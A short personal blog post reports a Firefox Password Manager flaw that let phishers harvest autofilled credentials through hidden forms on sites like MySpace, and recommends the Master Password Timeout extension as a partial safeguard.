Chapin Information Services (CIS) have discovered quite a major flaw in the way Firefox's Password Manager automatically populates username and password fields on a web form.

Whilst this is a major time saver, it does however allow phishers to gather usernames and passwords without you actually knowing it, especially on weblogs and forums which allow posters to input HTML. Essentially, they would just create a hidden form that Firefox would automatically populate with your username and password for that site and then submit it to the phisher's server when you click a link or hit enter. This doesn't use cross site scripting (XSS) methods either as it's essentially gathering passwords for the site you're actually visiting (hence most phishing detectors won't pick this up).

This was first discovered on MySpace, and I'm sure if you've visited MySpace before, you'll know you need to login to view a member's profile. View the wrong member's profile and your MySpace login, and who knows what else is now OWNED by someone else.

Mozilla have made the bug report public, and the Master Password Timeout Firefox extension, whilst doesn't resolve the issue, can help limit your chances of being hit by this.

I like to think I'm quite security conscious, but I certainly wasn't expecting this. I user the password manager so have opted for the Master Password Timeout plugin and set it to 10 seconds - yes it's means I have to enter my master password a lot, but it also means I'll know when a site is trying to steal my password.